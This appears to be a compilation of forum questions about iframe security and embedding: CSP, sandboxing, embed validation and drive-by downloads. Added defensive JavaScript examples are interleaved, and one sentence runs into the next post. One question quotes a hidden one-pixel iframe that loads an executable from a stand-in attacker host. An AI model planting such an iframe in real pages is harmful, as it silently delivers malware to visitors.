Yes, the browser and webserver are on the same machine!
Whenever I try to embed an HTML file from outside of the WWW root in an iframe, thus using the file:/// URL syntax, it is ignored. No error message logged or anything. Just nothing is done whatsoever.
If I change the path from ./blablabla.html, and put the file in the WWW root, it will display the HTML page in the iframe. So it’s not some kind of fundamental issue with displaying iframes or anything. I have tried both with and without URL-encoding the
IFRAMEs inherently unable to display file:/// URIs, even though the MozDev page mentions no restrictions whatsoever for the src attribute? https://developer.mozilla.org/en-US/docs/Web/HTML/Element/iframe
I am currently working on a project that uses iframes to distribute content to customers. Going ahead we would like to switch to a JSON-based REST API to deliver the content. API access would need a token to which specific content could be exposed and traffic limits set.
To replace the frontend appearance of the iframe I am thinking about writing a reusable bundle using a lightweight React alternative like preactjs. But this would mean exposing the raw API and the specific token to the end user. Simply routing user requests via the customer's server would conceal the token but still allow raw API access to the end user.
What would be a good architecture for such a use case?
Are there server-side rendered solutions that can easily be implemented across a variety of backend frameworks, that is, without rewriting everything for each customer?
Thanks for any advice
I’m building a part of a site where users can embed YouTube videos into their profile. I’m planning to have them get the embed iframe from YouTube directly, and submit that to our server. We’re then responsible for rendering it.
For completeness, a typical such iframe would look like this:
<iframe width="560" height="315" src="https://www.youtube.com/embed/ZK7ih4V0erc" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
Of course, it would be bad to just take whatever HTML the user provides and render it verbatim. My question is: How much effort should I go to to verify this iframe is what I expect?
My approach at the moment is to parse whatever HTML they provide, and:
- Verify that the fragment is an iframe,
- Verify that the src attribute comes from YouTube.
Is there anything beyond this that I should be watching out for? I’m okay with them specifying a YouTube video incorrectly (i.e. giving the ID for a video that doesn’t exist).
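The following is an added example, not code from the post above: it applies the two checks listed there to a submitted fragment, but keeps only the validated video ID and rebuilds the iframe from a fixed template, so no user-written attribute reaches the rendered page. The accepted host list and the 11-character ID pattern are assumptions for this example.

```javascript
// Added example (not from the original post): validate a user-submitted YouTube
// embed, keep only the video ID, and rebuild the iframe from a fixed template so
// that no user-supplied attribute ever reaches the rendered page.
const ALLOWED_HOSTS = new Set(['www.youtube.com']);  // assumption: only this host is accepted
const VIDEO_ID = /^[A-Za-z0-9_-]{11}$/;              // assumption: IDs are 11 URL-safe characters

// Minimal attribute parser for the inside of one start tag: name="v", name='v', name=v, name.
function parseAttributes(tagBody) {
  const attrs = {};
  const re = /([^\s"'<>\/=]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;
  let m;
  while ((m = re.exec(tagBody)) !== null) {
    const value = m[2] !== undefined ? m[2] : m[3] !== undefined ? m[3] : m[4] !== undefined ? m[4] : '';
    attrs[m[1].toLowerCase()] = value;
  }
  return attrs;
}

// Returns the video ID, or null unless the fragment is exactly one empty <iframe>
// whose src is https://www.youtube.com/embed/<id>.
function extractYoutubeId(fragment) {
  const m = /^<iframe\b([^>]*)>\s*<\/iframe>$/i.exec(fragment.trim());
  if (!m) return null;                                   // not a single iframe, or extra content around it
  const src = parseAttributes(m[1]).src;
  if (!src) return null;
  let url;
  try { url = new URL(src); } catch (e) { return null; } // relative URL, javascript:, or garbage
  if (url.protocol !== 'https:' || !ALLOWED_HOSTS.has(url.hostname)) return null;
  const path = /^\/embed\/([^\/]+)$/.exec(url.pathname); // URL() has already normalised ../ segments
  if (!path || !VIDEO_ID.test(path[1])) return null;
  return path[1];
}

// The only user-controlled bytes in the output are the validated ID.
function renderEmbed(fragment) {
  const id = extractYoutubeId(fragment);
  if (id === null) return null;
  return '<iframe width="560" height="315" src="https://www.youtube.com/embed/' + id + '" ' +
    'frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" ' +
    'allowfullscreen></iframe>';
}
```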
In the administration of advanced iframe I came across the following:
“Please do not use a different protocol for the iframe: Do not mix HTTP and HTTPS if possible!”.
What does this mean? If the protocol of my page is HTTP, then use an HTTP page inside the iframe. If the protocol of my page is HTTPS, then use an HTTPS page inside the iframe.
We have the following CSP directives defined on our site:
script-src 'self' 'unsafe-inline' 'unsafe-eval' *.youtube.com; style-src 'self' 'unsafe-inline'; frame-src *.facebook.com www.youtube.com;
As per this value, we only allow the Facebook and YouTube domains as src values in our site's iframes. But we have the following iframes rendered on our site.
<iframe id="EPFACLC-1579856043157" src="about:blank" frameborder="0" scrolling="no" title="chat widget"></iframe>
How are these iframes not restricted by the CSP rule?
Thanks in advance.
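An about:blank frame is never fetched, so frame-src is not consulted for it; the empty document inherits the parent page's CSP, and the widget's script, which script-src 'unsafe-inline' permits here, then writes the chat UI into it. The matcher below is an added example (not from the post) that evaluates frame URLs against the quoted frame-src list using the host-source matching rules, and shows that a host list can never match about:blank at all; it assumes a constructed page origin of https://example.com.

```javascript
// Added example (not from the original post): a small CSP3-style matcher for frame-src
// source expressions. Page origin https://example.com is constructed for this example.
const DEFAULT_PORT = { 'http:': '80', 'https:': '443', 'ws:': '80', 'wss:': '443' };
const NETWORK = new Set(['http:', 'https:', 'ws:', 'wss:']);

// "Scheme A matches scheme B": equal, or the http->https / ws->wss upgrade.
function schemeMatches(a, b) {
  return a === b || (a === 'http:' && b === 'https:') || (a === 'ws:' && b === 'wss:');
}

// Match one source expression ('*', 'self', scheme-source or host-source) against a URL.
function expressionMatches(expr, url, origin) {
  if (expr === '*') return NETWORK.has(url.protocol) || url.protocol === origin.protocol;
  if (expr === "'self'") return url.origin === origin.origin ||
    (origin.protocol === 'http:' && url.protocol === 'https:' && url.hostname === origin.hostname);
  if (/^[a-z][a-z0-9+.-]*:$/i.test(expr)) return schemeMatches(expr.toLowerCase(), url.protocol);
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*|(?:\*\.)?[^:\/*]+)(?::(\d+|\*))?(\/[^\s]*)?$/i.exec(expr);
  if (!m) return false;                               // malformed or unsupported expression
  const [, scheme, host, port, path] = m;
  // No scheme in the expression means "the page's own scheme" (plus its secure upgrade).
  const want = scheme ? scheme.toLowerCase() + ':' : origin.protocol;
  if (!schemeMatches(want, url.protocol)) return false;
  if (!url.hostname) return false;                    // about:blank, data:, blob: have no host to match
  const h = url.hostname.toLowerCase(), e = host.toLowerCase();
  if (e === '*') { /* any host */ }
  else if (e.startsWith('*.')) { if (!h.endsWith(e.slice(1))) return false; } // subdomains only, not the apex
  else if (h !== e) return false;
  const urlPort = url.port || DEFAULT_PORT[url.protocol] || '';
  if (port === undefined) { if (urlPort !== (DEFAULT_PORT[url.protocol] || '')) return false; }
  else if (port !== '*' && port !== urlPort) return false;
  if (path && path !== '/') {                         // trailing slash = prefix match, otherwise exact
    if (path.endsWith('/')) { if (!url.pathname.startsWith(path)) return false; }
    else if (url.pathname !== path) return false;
  }
  return true;
}

// Evaluate a frame URL against a frame-src source list such as "*.facebook.com www.youtube.com".
function frameSrcAllows(sourceList, frameUrl, pageOrigin = 'https://example.com') {
  const exprs = sourceList.trim().split(/\s+/).filter(Boolean);
  if (exprs.length === 0 || (exprs.length === 1 && exprs[0].toLowerCase() === "'none'")) return false;
  const url = new URL(frameUrl), origin = new URL(pageOrigin);
  return exprs.some((e) => expressionMatches(e, url, origin));
}
```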
Does the definition of a drive-by download include malicious execution of an unaccepted downloaded file, or is the unaccepted download of a file the drive-by download by itself? I didn’t find a good/clear definition.
Why is it possible to download files with a hidden iframe, so the user isn’t even asked if he wants to download it? Something like this:
<iframe src="https://attacker.com/evil.exe" width="1" height="1" frameborder="0"></iframe>
Isn’t this way too risky?
Thank you for your answers.
Is there a way to insert iframes into articles using GSA or GSA content generator?
I want to embed Google properties like spreadsheets, Google Forms and Google Drive inside my GSA articles.
How to use ip Iframe on my site without risking for surfing ads by site users, safely?
Is an iframe a good way?
<iframe src="<?= htmlspecialchars($url, ENT_QUOTES) ?>" sandbox="???"></iframe>
What methods can be used for security?
Displaying ads (surfing) like EvolutionScript.
Site security and site users’ security are both important.
I’m using a video hosting service that provides me with embed codes for the videos: something like this:
<iframe title="Part 1" width="640" height="360" allowTransparency="true" mozallowfullscreen webkitallowfullscreen allowfullscreen style="background-color:transparent;" frameBorder="0" src="https://app.vidgrid.com/embed/--video-id--"></iframe>
This works totally fine if embedded by a contributor on a SharePoint page (clicking “Add A Page > insert > Embed Code”) because I have added the video’s domain (app.vidgrid.com) to the HTML Field Security allowed list. But we have a Video Library (“Libraries > Training Video Library > Add > Video”) which also allows video iframes, and there the contributor sees this error (works for me, as an admin):
My guess is, SharePoint isn’t using the HTML Field Security allowed domain list for this video embed piece. Is there any hope? 😀 Or does everyone just need to add a full page for each video, or download the video as an MP4 and re-upload it to SharePoint (works but clunky).
Currently, we have a small personal project which is meant to allow people to create ‘profiles’ in HTML/CSS. We aim to put all this generated content within a sandboxed iframe. The next point in discussion comes from allowing scripts in these iframes since users will be able to enter whatever content they want.
Couple things to note:
- All these iframes are hosted under the same subdomain
- The site has a cross-origin policy of: allow-all
- Authorization is handled through tokens stored within a React app. Not cookies.
I am mostly curious about the security risks of such a design and I have not found a clear, concise answer. Should we allow scripts within these iframes, or does this pose too much of a risk? What type of attacks are we looking at through an iframe? I am concerned mostly with XSS-type attacks. What about browser vulnerabilities with iframes?
Thanks! Any feedback would be greatly appreciated.
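The sandbox="???" question above and this profile-iframe design ask the same thing: which sandbox tokens are safe for user HTML when the framing app holds auth tokens in the browser. The following is an added example, not code from any of the posts: it builds the iframe tag as a string, refuses the combinations that defeat the sandbox, and reports whether downloads from the frame (the hidden-iframe case asked about earlier) stay blocked; the origins https://app.example and https://usercontent.example are constructed.

```javascript
// Added example (not from any of the posts): pick the sandbox tokens for an iframe
// that shows user-authored HTML and reject combinations that defeat the sandbox.
// The origins https://app.example (the React app) and https://usercontent.example
// (a separate origin for profile HTML) are constructed for this example.
const KNOWN = new Set(['allow-scripts', 'allow-same-origin', 'allow-forms', 'allow-popups',
  'allow-popups-to-escape-sandbox', 'allow-downloads', 'allow-modals', 'allow-top-navigation',
  'allow-top-navigation-by-user-activation', 'allow-pointer-lock', 'allow-presentation']);

const escapeAttr = (s) => s.replace(/&/g, '&amp;').replace(/"/g, '&quot;').replace(/</g, '&lt;');

function buildSandboxedFrame(contentUrl, pageOrigin, tokens) {
  const content = new URL(contentUrl), page = new URL(pageOrigin), set = new Set(tokens);
  for (const t of set) if (!KNOWN.has(t)) throw new Error('unknown sandbox token: ' + t);
  const sameOrigin = content.origin === page.origin;
  const problems = [], warnings = [];

  // Scripts plus allow-same-origin on same-origin content: the framed document can reach
  // parent.document, remove its own sandbox attribute and read the app's localStorage tokens.
  if (set.has('allow-scripts') && set.has('allow-same-origin') && sameOrigin)
    problems.push('allow-scripts + allow-same-origin on same-origin content voids the sandbox');
  // Windows opened from the frame would run with no sandbox at all.
  if (set.has('allow-popups-to-escape-sandbox'))
    problems.push('allow-popups-to-escape-sandbox opens unsandboxed windows from user content');
  // Profile HTML on the app origin is one token away from the app itself; keep it elsewhere.
  if (sameOrigin) warnings.push('serve user content from its own origin, not the app origin');
  // With allow-same-origin every profile on the content origin shares its cookies and storage.
  if (set.has('allow-same-origin') && !sameOrigin)
    warnings.push('allow-same-origin makes all profiles share the content origin\'s storage');
  // The frame could navigate the whole tab elsewhere.
  if (set.has('allow-top-navigation'))
    warnings.push('allow-top-navigation lets the frame navigate the top-level page');

  if (problems.length) return { ok: false, problems, warnings };
  const sandbox = [...set].sort().join(' ');
  return {
    ok: true, problems, warnings, sandbox,
    // Without allow-downloads the browser blocks downloads started inside the frame,
    // which is the mitigation for the hidden-iframe download asked about above.
    downloadsBlocked: !set.has('allow-downloads'),
    html: '<iframe sandbox="' + sandbox + '" src="' + escapeAttr(contentUrl) +
      '" referrerpolicy="no-referrer"></iframe>',
  };
}
```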